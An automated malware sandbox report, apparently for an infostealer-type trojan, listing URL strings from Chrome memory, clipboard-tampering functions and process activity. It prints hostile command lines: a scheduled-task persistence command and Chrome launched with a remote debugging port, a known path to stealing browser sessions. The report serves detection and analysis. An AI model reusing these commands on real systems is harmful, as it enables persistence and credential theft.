Source: chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000004.00000002.2119846843.000073F000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124994437.00007BE000A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120583651.000073F000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000004.00000002.2120758382.000073F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087038233.000073F000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000004.00000002.2120758382.000073F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087038233.000073F000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000004.00000002.2120583651.000073F000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000002.2119846843.000073F000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120583651.000073F000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboards
Source: chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000002.2120758382.000073F00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087038233.000073F000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000004.00000003.2087616941.000073F0006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000004.00000003.2087213042.000073F00039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000004.00000002.2120635091.000073F00078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000004.00000002.2120635091.000073F00078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000004.00000002.2120550850.000073F000744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000004.00000002.2122001648.00007BE000330000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000004.00000002.2121234111.00007BE0000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000004.00000002.2121234111.00007BE0000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.2121234111.00007BE0000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000004.00000002.2121234111.00007BE0000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122127208.00007BE000394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2122522114.00007BE0004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.2122417775.00007BE00049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124576124.00007BE00093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.2124576124.00007BE00093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
Source: chrome.exe, 00000004.00000002.2122417775.00007BE00049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124576124.00007BE00093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000002.2122417775.00007BE00049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124576124.00007BE00093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000002.2124737119.00007BE0009A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000004.00000002.2121586736.00007BE0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000004.00000002.2125170673.00007BE000AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000003.2109217456.00007BE000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126444329.00007BE000DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126614297.00007BE000E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000002.2125170673.00007BE000AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000003.2109217456.00007BE000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121837872.00007BE0002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126614297.00007BE000E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2121837872.00007BE0002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000003.2109217456.00007BE000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000003.2109217456.00007BE000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126444329.00007BE000DE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126614297.00007BE000E3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2125170673.00007BE000AE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2109217456.00007BE000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126562368.00007BE000E25000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2126587425.00007BE000E30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2122447040.00007BE0004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2124737119.00007BE0009A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2124737119.00007BE0009A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2121045675.00007BE00008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2121179136.00007BE0000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2121586736.00007BE0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2123824964.00007BE00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122447040.00007BE0004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123696307.00007BE0007CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2123824964.00007BE00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122447040.00007BE0004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123696307.00007BE0007CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2124914704.00007BE000A1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2121586736.00007BE0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2125491332.00007BE000BB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2125640887.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2109499785.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2125640887.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2109499785.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2125640887.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2109499785.00007BE000C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2123259347.00007BE000710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122323273.00007BE000428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.2125989303.00007BE000CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2123857084.00007BE00081C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2124612675.00007BE00095C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121586736.00007BE0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124025388.00007BE00086C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2124612675.00007BE00095C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121586736.00007BE0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2124025388.00007BE00086C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2126661305.00007BE000E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2125726223.00007BE000C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122745677.00007BE0005B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122522114.00007BE0004F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2125726223.00007BE000C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoames)
Source: chrome.exe, 00000004.00000002.2123354438.00007BE000748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000002.2121750203.00007BE0002A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000004.00000002.2122447040.00007BE0004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2125054783.00007BE000A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2120847880.00007BE00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122745677.00007BE0005B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2125726223.00007BE000C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121645127.00007BE00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2122447040.00007BE0004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2122149780.00007BE0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092377647.00007BE00062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121837872.00007BE0002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2123134803.00007BE0006D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C189C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C189C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C189C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C189C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C189D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C189D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C189E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C189E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_000551B0 8_2_000551B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00053E20 8_2_00053E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B2CCE 8_2_6C1B2CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C17CD00 8_2_6C17CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C17EE50 8_2_6C17EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C180FC0 8_2_6C180FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C0AC0 8_2_6C1C0AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1844F0 8_2_6C1844F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B46E0 8_2_6C1B46E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B07D0 8_2_6C1B07D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1A87C0 8_2_6C1A87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C0060 8_2_6C1C0060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B2090 8_2_6C1B2090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1A2360 8_2_6C1A2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1CDC70 8_2_6C1CDC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C185880 8_2_6C185880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1A98F0 8_2_6C1A98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B7A20 8_2_6C1B7A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1BDBEE 8_2_6C1BDBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B140E 8_2_6C1B140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C1510 8_2_6C1C1510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1BF610 8_2_6C1BF610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C19F760 8_2_6C19F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C173000 8_2_6C173000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1870C0 8_2_6C1870C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C2350D0 8_2_6C2350D0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C243B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C23ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2436E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C243820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C245A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C245980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C243560 appears 42 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1844
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: bhovsmhv ZLIB complexity 0.994171853085554
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@17/5
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\zPZohgDsFq Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4144
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JhbVyuybpwXYHXyDefqs
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2123301766.00007BE00073C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2340,i,1016166225095006826,12192068235695981454,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 1844
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
